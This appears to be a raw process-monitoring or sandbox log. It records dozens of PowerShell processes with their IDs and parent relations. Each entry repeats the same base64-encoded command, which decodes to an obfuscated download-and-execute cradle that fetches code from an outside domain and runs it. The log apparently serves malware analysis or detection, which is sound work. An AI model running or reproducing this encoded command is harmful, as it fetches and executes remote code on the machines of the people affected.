"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
68
3992
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
69
2240
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
70
3036
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
71
2500
powershell.exe
2620
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
72
3248
powershell.exe
2548
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
73
2400
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
74
3368
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
75
3464
powershell.exe
2556
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
76
3540
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
77
3012
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
78
3000
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
79
3720
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
80
3828
powershell.exe
2140
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
81
2036
powershell.exe
2192
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
82
1400
powershell.exe
1444
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
83
2220
powershell.exe
2428
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Process
84
1312
powershell.exe
1600
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Process
85
1356
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
86
776
powershell.exe
1276
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
87
2488
powershell.exe
1560
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
88
4344
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
89
4420
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
90
4444
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Process
91
4484
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
92
4524
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
93
4544
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
94
4616
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
95
4648
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
96
4716
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
97
4756
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
98
4796
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
99
4832
powershell.exe
2880
powershell.exe
